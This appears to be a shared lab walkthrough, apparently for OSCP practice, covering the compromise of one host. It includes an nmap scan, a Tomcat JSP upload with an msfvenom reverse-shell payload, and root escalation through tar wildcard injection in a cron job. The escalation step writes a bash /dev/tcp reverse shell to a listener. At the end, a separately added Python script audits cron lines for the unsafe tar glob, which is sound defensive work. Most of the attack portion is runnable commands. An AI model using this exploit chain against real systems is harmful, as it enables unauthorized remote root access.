Network Security Exploit Guide

Uploaded by khunthai.mm

new 97:

Nmap scan report for 192.168.xx.97
Host is up (0.18s latency).
Not shown: 65526 filtered ports
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.5 (protocol 2.0)
| ssh-hostkey:
|   3072 b8:43:f3:11:ec:2b:21:3b:f8:b7:a9:96:c9:51:eb:c7 (RSA)
|   256 9f:87:28:20:32:e2:9d:04:c6:60:14:41:31:5f:62:13 (ECDSA)
|   256 93:87:dd:f4:25:3a:9a:db:5d:f6:e7:4c:41:ee:df:5a (ED25519)
80/tcp   closed http
139/tcp  closed netbios-ssn
443/tcp  closed https
445/tcp  closed microsoft-ds
7080/tcp open   http         Apache httpd 2.4.46 ((Unix))
| http-methods:
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|   Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Unix)
|_http-title: Login V7
7445/tcp open   netbios-ssn  Samba smbd 4.6.2
8080/tcp open   http         Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.81
8095/tcp open   http         nginx 1.18.0
| http-methods:
|   Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0
|_http-title: Login V13

User: upload a JSP shell (generated with msfvenom) in a PUT request; exploit https://www.exploit-db.com/exploits/42953

uname -a

Linux oscp 5.11.11-arch1-1 #1 SMP PREEMPT Tue, 30 Mar 2021 14:10:17 +0000 x86_64 GNU/Linux

ROOT:

Cron job: /etc/cron.d/5minutes

A file containing a reverse shell has to be created and placed in /opt/tomcat.

Exploit Database: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP ...

I will write more details for .97 so you understand it better.
First, generate the msfvenom payload this way:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

Put it in a Burp PUT request.

For the root part:

Checking the cron jobs, you will see one that runs tar on the /opt/tomcat directory.

It's a wildcard injection: tar treats filenames expanded from an unquoted * as command-line options.

So what you do is create three files:

1: --checkpoint=1

2: --checkpoint-action=exec=sh test.sh

3: test.sh (rev shell)


This is the cron job.

This is an example:

https://blog.certcube.com/back-to-the-future-unix-wildcards-injection/
1. I ran this from the /opt/tomcat directory:
tar -zcf /tmp/tom.tar.gz *

2. Then execute the following from /opt/tomcat:

echo "" > --checkpoint=1
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "bash -i >& /dev/tcp/192.168.x.x/8095 0>&1" > root.sh

3. Set up a netcat listener on port 8095.

4. Then wait for 5 minutes.
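A defender-side audit for the tar wildcard pattern described above, added here as an example and not part of the original notes: it flags a cron command that hands tar an unquoted bare '*' and lists option-like filenames in the archived directory. The cron.d line is constructed from the description above; the safe forms ('-- *' or './*') rely on GNU tar treating '--' as the end of options and never reading './--checkpoint=1' as an option.

```python
import os
import re
import shlex

def tar_glob_is_unsafe(command: str) -> bool:
    """True if a tar call in this shell command passes an unquoted bare '*'
    where tar still parses options: no '--' before it and no path prefix."""
    # Heuristic split on shell separators; separators inside quotes are not handled.
    for simple in re.split(r"&&|\|\||;|\|", command):
        tokens = shlex.split(simple, posix=False)   # posix=False keeps quotes on tokens
        if not tokens or os.path.basename(tokens[0]) != "tar":
            continue
        for tok in tokens[1:]:
            if tok == "--":
                break                    # everything after '--' is a file operand
            if tok.startswith("*"):
                return True              # bare glob: expansion may yield '--...' names
    return False

def audit_cron_line(line: str) -> dict:
    """Parse one /etc/cron.d line (5 time fields, user, command) and report
    whether the command is exposed to wildcard injection."""
    fields = line.split(None, 6)
    if len(fields) < 7:
        raise ValueError("expected cron.d format: m h dom mon dow user command")
    return {"user": fields[5], "command": fields[6],
            "unsafe": tar_glob_is_unsafe(fields[6])}

def classify_name(name: str) -> str:
    """Label a filename by how GNU tar would parse it as an argument;
    the checkpoint pair from the notes above is the indicator to look for."""
    if name.startswith("--checkpoint-action="):
        return "command-execution option"
    if name.startswith("--checkpoint"):
        return "checkpoint trigger"
    if name.startswith("-"):
        return "other option-like name"
    return "benign"

def option_like_names(directory: str) -> list:
    """Entries whose names begin with '-' in a directory that a cron job
    archives with a wildcard; sorted so the result is deterministic."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))

if __name__ == "__main__":
    # Constructed cron.d line reflecting the job the notes describe.
    job = "*/5 * * * * root cd /opt/tomcat && tar -zcf /tmp/tom.tar.gz *"
    print(audit_cron_line(job))                                    # unsafe: True
    print(audit_cron_line(job.replace("tom.tar.gz *", "tom.tar.gz -- *")))  # unsafe: False
```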
